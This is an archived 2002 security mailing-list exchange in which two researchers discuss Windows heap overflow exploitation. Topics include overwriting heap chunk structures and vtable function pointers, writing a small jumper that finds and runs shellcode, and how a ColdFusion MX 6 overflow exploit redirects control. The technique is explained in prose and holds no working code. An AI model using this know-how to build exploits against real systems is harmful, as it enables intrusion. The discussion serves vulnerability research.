Dave wrote: > e.g. > call dword ptr [ecx + 14H] > > It's important to remember that heap overflows isn't just about > overflowing > character arrays that have been malloc()ed. Yup thats true, playing with different sizes and differents hex codes to overflow can land you in many different spots such as call [ecx + ??] mov [ecx],[eax] movsb cmp al,?? -> mov something. The main point I was trying to press is that we can use the routines to write our egg into a known writable address. Albiet a tricky and time consuming way, so the trick is to write a small jumper to known memory and call the jumper. The jumper can then locate out main shell code and run it. With the 4 bytes you are limited to something like [reg +/- 80] or so... But can do stuff like add esp,?? ret or prepend our jumper to known fixed hex codes so as we can leave a byte or two out giving us 6 bytes. From the recent CFMX6 overflow. The exploit lands on the normal mov [ecx],eax carries on checks a byte to see if there is more, and then uses another byte to calculate the offset to where the next structure is. Even if only chunk structure has been overwritten we now have control of where the routine will look for the next structure. Massive amounts of repeated code allows for a good chance to hit the spot. Brett > -----Original Message----- > From: David Litchfield [mailto:davidat_private] > Sent: Monday, 2 December 2002 22:29 > To: pen-testat_private; vuln-devat_private > Subject: Re: Windows Heap Overflows In General > > > > *) Remember with heap based overflows you can write multiple sets of 4 > > bytes. It's not the registers you are overflowing, but a structure. What > do > > the other structure bytes control? Size does matter! > > http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html > > * Wheres our code at? It's not just esp that holds important variable > > locations. Where do all those other numbers point? > > In the case overflowing the data section of one object into the vtable of > another object you'll be overwriting function pointers and when one is > called you can redirect program control > > e.g. > call dword ptr [ecx + 14H] > > It's important to remember that heap overflows isn't just about > overflowing > character arrays that have been malloc()ed. > > Cheers, > David Litchfield > http://www.ngssoftware.com/ >
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 16:22:53 PST